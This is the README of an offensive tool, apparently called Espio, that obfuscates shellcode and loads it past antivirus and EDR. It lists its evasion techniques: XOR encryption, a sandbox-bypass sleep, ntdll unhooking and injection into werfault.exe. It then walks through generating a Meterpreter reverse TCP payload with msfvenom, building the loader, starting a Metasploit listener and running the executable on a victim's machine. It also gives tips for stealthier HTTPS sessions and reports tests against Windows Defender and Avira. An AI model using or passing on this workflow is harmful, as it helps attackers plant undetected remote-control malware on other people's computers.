Shellcode obfuscation tool to avoid AV/EDR.
Features
- Obfuscation - base64 encoding and XOR encryption with a randomly generated key.
- Sandbox Bypass - custom sleep function.
- DLL Unhooking - full unhook of ntdll.dll.
- Process Injection - injecting the payload to werfault.exe.
Requirements
Espio requires Python3 and Visual Studio to use.
Usage
- Clone the repository:
git clone https://github.com/Konis-Bros/Espio.git
- Generate the shellcode. In this demonstration we will be using msfvenom in a kali machine:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<Attacker IP> LPORT=1337 -f raw -o shellcode
- Put the shellcode in the cloned repository and use the obfuscator.py tool to obfuscate it:
python3 obfuscator.py shellcode
Note: Our shellcode then be obfuscated to obfuscatedPayload.bin with the key.bin key and saved in loader/Espio.
-
Open loader/Espio.sln, the Visual Studio solution file.
-
Build The project. Note that the executable file will be located at loader/x64/Debug/Espio.exe.
-
On the attacker's machine, listen for TCP connections on the defined port. In our case, run metasploit's multi/handler on port 1337.
-
Drop the executable onto the victim's machine and run it.
Recommendations
- In step 2 and 6, create meterpreter session over HTTPS. For more information see Meterpreter HTTP/HTTPS Communication.
- In step 5, change the build configuration from Debug to Release. Note that the executable file will now be located at loader/x64/Release/Espio.exe.
Tests
Espio was examined against:
Windows Defender:
Avira Prime:
ANTISCAN:
Authors and Acknowledgments
License
Distributed under the MIT License. See LICENSE.txt for more information.